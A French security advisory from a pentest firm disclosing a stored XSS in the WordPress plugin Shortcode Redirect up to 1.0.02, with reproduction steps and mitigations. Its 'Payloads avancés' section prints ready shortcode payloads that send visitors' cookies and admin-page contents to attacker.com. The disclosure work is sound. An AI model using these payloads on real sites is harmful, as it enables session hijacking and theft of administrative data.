Aller au contenu principal

Shortcode Redirect <= 1.0.02: XSS stockée via le paramètre sec

14 août 2025
6 min de lecture

Le plugin WordPress Shortcode Redirect jusqu'à la version 1.0.02 est vulnérable à une XSS stockée via le paramètre 'sec' du shortcode [redirect]. Corrigé en 1.0.03.

Shortcode Redirect <= 1.0.02: XSS stockée via le paramètre sec

> Découverte par Rooting Studio — Corrigé en 1.0.03 — Priorité: faible

Résumé

  • Logiciel: Shortcode Redirect (plugin WordPress)
  • Versions vulnérables: <= 1.0.02
  • Corrigé dans: 1.0.03
  • Gravité: Moyenne (CVSS 6.5)
  • Type: Cross-Site Scripting (XSS) stockée
  • Privilèges requis: Contributor (édition de contenu)

Description technique

Le paramètre sec du shortcode [redirect] est insuffisamment validé: il utilise esc_attr() mais est réinséré dans un attribut content de balise meta, permettant de casser le contexte HTML et d'injecter du JavaScript.

Reproduction

1. Installer Shortcode Redirect 1.0.02

2. Se connecter avec des privilèges Contributor ou plus

3. Créer un article et insérer:

[redirect url='https://google.com' sec='0"><script>alert("Stored XSS Vulnerability")</script><meta content="']

4. Publier et visiter la page: l'alerte s'exécute (XSS confirmée).

Payloads avancés

  • Vol de cookies:
[redirect url='https://google.com' sec='0"><script>document.location="http://attacker.com/steal?c="+document.cookie</script><meta content="']
  • Exfiltration de page admin:
[redirect url='https://google.com' sec='0"><script>fetch("/wp-admin/",{credentials:"include"}).then(r=>r.text()).then(d=>fetch("http://attacker.com/admin",{method:"POST",body:d}))</script><meta content="']

Mitigation

  • Mettre à jour en 1.0.03 (correctif disponible).
  • Restreindre l'usage du shortcode aux rôles de confiance.
  • Filtrer côté serveur et encoder correctement le contenu dans son contexte HTML.

Références

  • OWASP Top 10 — A03: Injection
  • Bonnes pratiques d'encodage de sortie (contextuel)

Besoin d’un audit pragmatique et reproductible ? Découvrez notre **pentest web**.

Votre site est-il sécurisé ?

Faites analyser la sécurité de votre site web par nos experts en cybersécurité.

Articles similaires

AnyComment <= 0.3.6: SQL Injection permettant la suppression massive de fichiers

Le plugin WordPress AnyComment jusqu'à la version 0.3.6 est vulnérable à une injection SQL dans l'endpoint de suppression de fichiers. Un abonné peut supprimer massivement les fichiers uploadés.

Gestion d'incidents cybersécurité : Guide complet pour PME

Découvrez comment gérer efficacement les incidents de cybersécurité. Guide pratique avec procédures, checklists et bonnes pratiques pour les PME.

Formation cybersécurité : Guide complet pour sensibiliser vos équipes

Découvrez comment former efficacement vos équipes à la cybersécurité. Guide pratique avec exemples concrets, programmes de formation et bonnes pratiques.